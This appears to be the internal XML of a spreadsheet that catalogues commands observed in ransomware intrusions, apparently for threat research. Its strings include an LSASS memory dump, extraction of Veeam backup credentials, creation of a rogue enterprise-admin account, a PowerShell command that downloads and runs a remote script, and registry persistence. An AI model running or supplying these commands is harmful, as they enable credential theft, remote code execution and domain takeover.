  <si>
    <t>psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials"</t>
  </si>
  <si>
    <t xml:space="preserve">veeam </t>
  </si>
  <si>
    <t>cmd.exe /Q /c for /f "tokens=1,2 delims= " %%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 %%B \Windows\Temp\*.* full</t>
  </si>
  <si>
    <t>cobaltstrike, lsass, comsvcs</t>
  </si>
  <si>
    <t>psql, postgress, veeambackup</t>
  </si>
  <si>
    <t>postgres, veeambackup</t>
  </si>
  <si>
    <t>systeminfo.exe</t>
  </si>
  <si>
    <t>nltest.exe /dclist</t>
  </si>
  <si>
    <t>nltest.exe /domain_trusts</t>
  </si>
  <si>
    <t>whoami.exe /groups</t>
  </si>
  <si>
    <t>net.exe group "domain admins" /dom</t>
  </si>
  <si>
    <t>net.exe group "enterprise admins" /dom</t>
  </si>
  <si>
    <t>woami</t>
  </si>
  <si>
    <t>net user backup_EA P@ssw0rd1234 /add /dom</t>
  </si>
  <si>
    <t>net group "enterprise admins" backup_EA /add /dom</t>
  </si>
  <si>
    <t>Rustdesk Pivot via root, ssh reverse tunnel</t>
  </si>
  <si>
    <t>RustDesk</t>
  </si>
  <si>
    <t>Veeam Backup</t>
  </si>
  <si>
    <t>ransom-eid1518</t>
  </si>
  <si>
    <t>ransom-eid1519</t>
  </si>
  <si>
    <t>ransom-eid1520</t>
  </si>
  <si>
    <t>ransom-eid1521</t>
  </si>
  <si>
    <t>ransom-eid1522</t>
  </si>
  <si>
    <t>ransom-eid1523</t>
  </si>
  <si>
    <t>ransom-eid1524</t>
  </si>
  <si>
    <t>ransom-eid1525</t>
  </si>
  <si>
    <t>ransom-eid1526</t>
  </si>
  <si>
    <t>ransom-eid1527</t>
  </si>
  <si>
    <t>ransom-eid1528</t>
  </si>
  <si>
    <t>ransom-eid1529</t>
  </si>
  <si>
    <t>ransom-eid1530</t>
  </si>
  <si>
    <t>pshell,reg</t>
  </si>
  <si>
    <t>{"date": "2025-07", "url": "https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/", "tags": ["interlock"]}</t>
  </si>
  <si>
    <t>{"date": "2025-08", "url": "https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/", "tags": ["akira"]}</t>
  </si>
  <si>
    <t>"C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1</t>
  </si>
  <si>
    <t>"powershell.exe" -ep Bypass -w H -c "schtasks /delete /tn Updater /f; $w=New-Object System.Net.WebClient ; $w.Headers.Add(\"User-Agent\", \"PowerShell\") ; $w.DownloadString(\"http://deadly-programming-attorneys-our.trycloudflare.com\") | iex"</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -c Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.State -ne 'Permanent' } |
            Select-Object @{Name='Interface'; Expression={$_.InterfaceAlias}},
                          @{Name='Internet Address'; Expression={$_.IPAddress}},
                          @{Name='Physical Address'; Expression={$_.LinkLayerAddress}},
                          @{Name='Type'; Expression={'dynamic'}} |
            ConvertTo-Json"</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -c "systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -c "if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } ""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -c "tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -c "Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -c "Get-PSDrive -PSProvider FileSystem | ConvertTo-Json""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -WindowStyle Hidden -Command "echo AD_Computers: ([adsiSearcher]\"(ObjectClass=computer)\").FindAll().count""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -Command "$searcher = [adsisearcher]'(&amp;(objectCategory=user)(description=*))'; $searcher.PropertiesToLoad.Add('samaccountname'); $searcher.PropertiesToLoad.Add('description'); $results = $searcher.FindAll(); foreach ($result in $results) { $result.Properties['samaccountname'][0] + ' - ' + $result.Properties['description'][0] }""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "net user %%USERNAME%% /domain"</t>
  </si>
  <si>
    <t>cmd.exe /s /c "powershell -Command "$searcher = New-Object DirectoryServices.DirectorySearcher '(&amp;(objectCategory=computer))'; $searcher.PropertiesToLoad.Add('name') | Out-Null; $searcher.PropertiesToLoad.Add('description') | Out-Null; $results = $searcher.FindAll(); foreach ($result in $results) { $computerName = $result.Properties['name'][0]; if ($computerName -match '(?i)VB|VBR|VEEA|VEEAM|BCK|BACK') { $desc = $result.Properties['description']; if ($desc -and $desc[0]) { Write-Output \"${computerName} - $($desc[0])\" } else { Write-Output \"$computerName\" } } }""</t>
  </si>
  <si>
    <t>cmd.exe /s /c "tasklist"</t>
  </si>
  <si>
    <t>cmd.exe /s /c "nltest /dclist:"</t>
  </si>
  <si>
    <t>cmd.exe /s /c "whoami"</t>
  </si>
  <si>
    <t>cmd.exe /s /c "dir %%appdata%%"</t>
  </si>
  <si>
    <t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "REDACTED" /t REG_SZ /d ""C:\Users\REDACTED\AppData\Roaming\php\php.exe" "C:\Users\REDACTED\AppData\Roaming\php\wefs.cfg"" /f</t>
  </si>
  <si>
    <t xml:space="preserve"> netclt</t>
  </si>
  <si>
    <t>ransom-eid1531</t>
  </si>
  <si>
    <t>ransom-eid1532</t>
  </si>
  <si>
    <t>ransom-eid1533</t>
  </si>
  <si>
    <t>ransom-eid1534</t>
  </si>
  <si>
    <t>ransom-eid1535</t>
  </si>
  <si>
    <t>ransom-eid1536</t>
  </si>
  <si>
    <t>ransom-eid1537</t>
  </si>
  <si>
    <t>ransom-eid1538</t>
  </si>
  <si>
    <t>ransom-eid1539</t>
  </si>
  <si>
    <t>ransom-eid1540</t>
  </si>
  <si>
    <t>ransom-eid1541</t>
  </si>
  <si>
    <t>ransom-eid1542</t>
  </si>
  <si>
    <t>ransom-eid1543</t>
  </si>
  <si>
    <t>ransom-eid1544</t>
  </si>
  <si>
    <t>ransom-eid1545</t>
  </si>
  <si>
    <t>ransom-eid1546</t>
  </si>
  <si>
    <t>ransom-eid1547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</si>
</sst>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47" totalsRowShown="0" headerRowDxfId="23">
  <autoFilter ref="A1:L1547" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:L1530">
    <sortCondition ref="A1:A1530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3" totalsRowShown="0" headerRowDxfId="17">
  <autoFilter ref="A1:K23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K124" totalsRowShown="0" headerRowDxfId="14">
  <autoFilter ref="A1:K124" xr:uid="{B77CD816-F5BF-BE44-BD53-B9C4C733495A}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K110">
    <sortCondition ref="A1:A110"/>
  </sortState>
  <tableColumns count="11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11" xr3:uid="{D4E65CF8-CBE9-7940-91F4-42D9592F750C}" name="object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36" totalsRowShown="0" headerRowDxfId="2">
  <autoFilter ref="A1:H336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ED12F-3AAC-C346-8EB1-0D57DE3DCA05}" name="Table8" displayName="Table8" ref="A1:F45" totalsRowShown="0">
  <autoFilter ref="A1:F45" xr:uid="{C6AED12F-3AAC-C346-8EB1-0D57DE3DCA05}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F43">
    <sortCondition ref="B1:B43"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{A6047602-0A4C-E743-B9BB-02EFC3C69398}" name="report"/>
    <tableColumn id="2" xr3:uid="{6A509063-018E-F74E-86A2-40C23D71F7F0}" name="date"/>
    <tableColumn id="3" xr3:uid="{3B7A2DD2-808D-9E42-98FF-4F2900BF9823}" name="type"/>
    <tableColumn id="4" xr3:uid="{7E395C7B-E221-8C4D-B3F7-78DCA08172B9}" name="tag"/>
    <tableColumn id="5" xr3:uid="{EF298510-2DD3-DD4A-B129-BE4EDC15BF48}" name="label"/>
    <tableColumn id="6" xr3:uid="{05A7C6AB-C44A-6042-A912-1955AB2F6EB7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47"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A1538" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="L1531" sqref="L1531:L1547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3175</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>9</v>
      </c>
      <c r="E2" s="1"/>
      <c r="L2" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="3" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="B3" t="s">
        <v>3175</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E3" s="1"/>
      <c r="L3" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>1193</v>
      </c>
      <c r="B4" t="s">
        <v>3175</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>11</v>
      </c>
      <c r="E4" s="1"/>
      <c r="L4" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="68" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>1194</v>
      </c>
      <c r="B5" t="s">
        <v>3169</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E5" s="1"/>
      <c r="L5" s="1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3162</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E8" s="1"/>
      <c r="L8" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>1198</v>
      </c>
      <c r="B9" t="s">
        <v>3147</v>
      </c>
      <c r="D9" s="1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3156</v>
      </c>
      <c r="D10" s="1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3162</v>
      </c>
      <c r="D11" s="1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3162</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E12" s="1"/>
      <c r="L12" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="13" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>1202</v>
      </c>
      <c r="B13" t="s">
        <v>3162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3162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3162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3162</v>
      </c>
      <c r="D16" s="1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3162</v>
      </c>
      <c r="D17" s="1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1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="19" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>1208</v>
      </c>
      <c r="B19" t="s">
        <v>3211</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D19" s="1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3211</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D20" s="1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3211</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D21" s="1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3211</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D22" s="1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3211</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D23" s="1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3211</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D24" s="1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3211</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D25" s="1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1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3211</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D27" s="1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3211</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D28" s="1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3211</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D29" s="1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t="s">
        <v>3212</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D30" s="1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t="s">
        <v>3212</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D31" s="1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3152</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E32" s="1"/>
      <c r="L32" s="1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3169</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E35" s="1"/>
      <c r="L35" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="36" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>1225</v>
      </c>
      <c r="B36" t="s">
        <v>3169</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E36" s="1"/>
      <c r="L36" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="37" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>1226</v>
      </c>
      <c r="B37" t="s">
        <v>3169</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>47</v>
      </c>
      <c r="E37" s="1"/>
      <c r="L37" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="38" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="B38" t="s">
        <v>3169</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E38" s="1"/>
      <c r="L38" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="39" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>1228</v>
      </c>
      <c r="B39" t="s">
        <v>3169</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E39" s="1"/>
      <c r="L39" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="40" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>1229</v>
      </c>
      <c r="B40" t="s">
        <v>3169</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E40" s="1"/>
      <c r="L40" s="1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3169</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E48" s="1"/>
      <c r="L48" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="49" spans="1:12" ht="51" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>1238</v>
      </c>
      <c r="B49" t="s">
        <v>3169</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E49" s="1"/>
      <c r="L49" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="50" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>1239</v>
      </c>
      <c r="B50" t="s">
        <v>3174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3186</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E52" s="1"/>
      <c r="L52" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="53" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>1242</v>
      </c>
      <c r="B53" t="s">
        <v>3145</v>
      </c>
      <c r="D53" s="1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3169</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E54" s="1"/>
      <c r="L54" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="55" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>1244</v>
      </c>
      <c r="B55" t="s">
        <v>3184</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E55" s="1"/>
      <c r="L55" s="1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3186</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E57" s="1"/>
      <c r="L57" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="58" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>1247</v>
      </c>
      <c r="B58" t="s">
        <v>3185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3185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3171</v>
      </c>
      <c r="D60" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E60" s="1"/>
      <c r="L60" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="61" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A61" s="1" t="s">
        <v>1250</v>
      </c>
      <c r="B61" t="s">
        <v>3171</v>
      </c>
      <c r="D61" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E61" s="1"/>
      <c r="L61" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="62" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A62" s="1" t="s">
        <v>1251</v>
      </c>
      <c r="B62" t="s">
        <v>3152</v>
      </c>
      <c r="D62" s="1" t="s">
        <v>67</v>
      </c>
      <c r="E62" s="1"/>
      <c r="L62" s="1" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="63" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A63" s="1" t="s">
        <v>1252</v>
      </c>
      <c r="B63" t="s">
        <v>3162</v>
      </c>
      <c r="D63" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E63" s="1"/>
      <c r="L63" s="1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="67" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A67" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="B67" t="s">
        <v>3137</v>
      </c>
      <c r="D67" s="1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1" t="s">
        <v>140</v>
      </c>
      <c r="E68" s="1"/>
      <c r="L68" s="1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1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="71" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A71" s="1" t="s">
        <v>1260</v>
      </c>
      <c r="B71" t="s">
        <v>3211</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D71" s="1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3211</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D72" s="1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3211</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D73" s="1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3211</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D74" s="1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3211</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D75" s="1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3211</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D76" s="1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3211</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D77" s="1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3211</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D78" s="1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3211</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D79" s="1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3211</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D80" s="1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3211</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D81" s="1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3147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3181</v>
      </c>
      <c r="D83" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E83" s="1" t="s">
        <v>180</v>
      </c>
      <c r="L83" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="84" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A84" s="1" t="s">
        <v>1273</v>
      </c>
      <c r="B84" t="s">
        <v>3162</v>
      </c>
      <c r="D84" s="1" t="s">
        <v>154</v>
      </c>
      <c r="E84" s="1"/>
      <c r="L84" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="85" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A85" s="1" t="s">
        <v>1274</v>
      </c>
      <c r="B85" t="s">
        <v>3156</v>
      </c>
      <c r="D85" s="1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3156</v>
      </c>
      <c r="D86" s="1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3162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3162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3147</v>
      </c>
      <c r="D89" s="1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3162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3207</v>
      </c>
      <c r="D91" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E91" s="1" t="s">
        <v>180</v>
      </c>
      <c r="L91" s="1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1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="94" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A94" s="1" t="s">
        <v>1283</v>
      </c>
      <c r="B94" t="s">
        <v>3211</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>108</v>
      </c>
      <c r="D94" s="1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3192</v>
      </c>
      <c r="D95" s="1" t="s">
        <v>169</v>
      </c>
      <c r="E95" s="1" t="s">
        <v>170</v>
      </c>
      <c r="L95" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="96" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A96" s="1" t="s">
        <v>1285</v>
      </c>
      <c r="B96" t="s">
        <v>3170</v>
      </c>
      <c r="D96" s="1" t="s">
        <v>171</v>
      </c>
      <c r="E96" s="1" t="s">
        <v>172</v>
      </c>
      <c r="L96" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="97" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A97" s="1" t="s">
        <v>1286</v>
      </c>
      <c r="B97" t="s">
        <v>3196</v>
      </c>
      <c r="D97" s="1" t="s">
        <v>180</v>
      </c>
      <c r="E97" s="1" t="s">
        <v>171</v>
      </c>
      <c r="L97" s="1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="99" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A99" s="1" t="s">
        <v>1288</v>
      </c>
      <c r="B99" t="s">
        <v>3507</v>
      </c>
      <c r="D99" s="1" t="s">
        <v>139</v>
      </c>
      <c r="E99" s="1" t="s">
        <v>174</v>
      </c>
      <c r="L99" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="100" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A100" s="1" t="s">
        <v>1289</v>
      </c>
      <c r="B100" t="s">
        <v>3507</v>
      </c>
      <c r="D100" s="1" t="s">
        <v>175</v>
      </c>
      <c r="E100" s="1" t="s">
        <v>174</v>
      </c>
      <c r="L100" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="101" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A101" s="1" t="s">
        <v>1290</v>
      </c>
      <c r="B101" t="s">
        <v>3507</v>
      </c>
      <c r="D101" s="1" t="s">
        <v>176</v>
      </c>
      <c r="E101" s="1" t="s">
        <v>174</v>
      </c>
      <c r="L101" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="102" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A102" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="B102" t="s">
        <v>3177</v>
      </c>
      <c r="D102" s="1" t="s">
        <v>174</v>
      </c>
      <c r="E102" s="1" t="s">
        <v>177</v>
      </c>
      <c r="L102" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="103" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A103" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="B103" t="s">
        <v>3177</v>
      </c>
      <c r="D103" s="1" t="s">
        <v>174</v>
      </c>
      <c r="E103" s="1" t="s">
        <v>178</v>
      </c>
      <c r="L103" s="1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="105" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A105" s="1" t="s">
        <v>1294</v>
      </c>
      <c r="B105" t="s">
        <v>3196</v>
      </c>
      <c r="D105" s="1" t="s">
        <v>179</v>
      </c>
      <c r="E105" s="1" t="s">
        <v>174</v>
      </c>
      <c r="L105" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="106" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A106" s="1" t="s">
        <v>1295</v>
      </c>
      <c r="B106" t="s">
        <v>3139</v>
      </c>
      <c r="D106" s="1" t="s">
        <v>181</v>
      </c>
      <c r="E106" s="1" t="s">
        <v>180</v>
      </c>
      <c r="L106" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="107" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A107" s="1" t="s">
        <v>1296</v>
      </c>
      <c r="B107" t="s">
        <v>3162</v>
      </c>
      <c r="D107" s="1" t="s">
        <v>154</v>
      </c>
      <c r="E107" s="1" t="s">
        <v>180</v>
      </c>
      <c r="L107" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="108" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A108" s="1" t="s">
        <v>1297</v>
      </c>
      <c r="B108" t="s">
        <v>3147</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D108" s="1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="110" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A110" s="1" t="s">
        <v>1299</v>
      </c>
      <c r="B110" t="s">
        <v>3162</v>
      </c>
      <c r="C110" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D110" s="1" t="s">
        <v>154</v>
      </c>
      <c r="E110" s="1" t="s">
        <v>182</v>
      </c>
      <c r="L110" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="111" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A111" s="1" t="s">
        <v>1300</v>
      </c>
      <c r="B111" t="s">
        <v>3156</v>
      </c>
      <c r="C111" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D111" s="1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3156</v>
      </c>
      <c r="C112" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D112" s="1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3162</v>
      </c>
      <c r="C113" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D113" s="1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3162</v>
      </c>
      <c r="C114" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D114" s="1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3162</v>
      </c>
      <c r="C115" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D115" s="1" t="s">
        <v>158</v>
      </c>
      <c r="E115" s="1" t="s">
        <v>182</v>
      </c>
      <c r="L115" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="116" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A116" s="1" t="s">
        <v>1305</v>
      </c>
      <c r="B116" t="s">
        <v>3156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3162</v>
      </c>
      <c r="C117" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D117" s="1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3162</v>
      </c>
      <c r="C118" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D118" s="1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3162</v>
      </c>
      <c r="C119" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D119" s="1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3162</v>
      </c>
      <c r="C120" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D120" s="1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3156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3162</v>
      </c>
      <c r="C122" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D122" s="1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="124" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A124" s="1" t="s">
        <v>1313</v>
      </c>
      <c r="B124" t="s">
        <v>3147</v>
      </c>
      <c r="C124" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D124" s="1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3162</v>
      </c>
      <c r="C125" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D125" s="1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1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="127" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A127" s="1" t="s">
        <v>1316</v>
      </c>
      <c r="B127" t="s">
        <v>3172</v>
      </c>
      <c r="C127" s="1" t="s">
        <v>235</v>
      </c>
      <c r="D127" s="1" t="s">
        <v>166</v>
      </c>
      <c r="E127" s="1" t="s">
        <v>182</v>
      </c>
      <c r="L127" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="128" spans="1:12" ht="34" x14ac:dyDescent="0.2">
      <c r="A128" s="1" t="s">
        <v>1317</v>
      </c>
      <c r="B128" t="s">
        <v>3156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3160</v>
      </c>
      <c r="D129" s="1" t="s">
        <v>183</v>
      </c>
      <c r="E129" s="1" t="s">
        <v>170</v>
      </c>
      <c r="L129" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="130" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A130" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="B130" t="s">
        <v>3160</v>
      </c>
      <c r="D130" s="1" t="s">
        <v>184</v>
      </c>
      <c r="E130" s="1" t="s">
        <v>170</v>
      </c>
      <c r="L130" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="131" spans="1:12" ht="17" x14ac:dyDescent="0.2">
      <c r="A131" s="1" t="s">
        <v>1320</v>
      </c>
      <c r="B131" t="s">
        <v>3193</v>
      </c>
      <c r="D131" s="1" t="s">
        <v>185</v>
      </c>
      <c r="E131" s="1" t="s">
        <v>186</v>
      </c>
      <c r="L131" s="1" t="s">
        <v>3102</v>
      </c>
    </row>
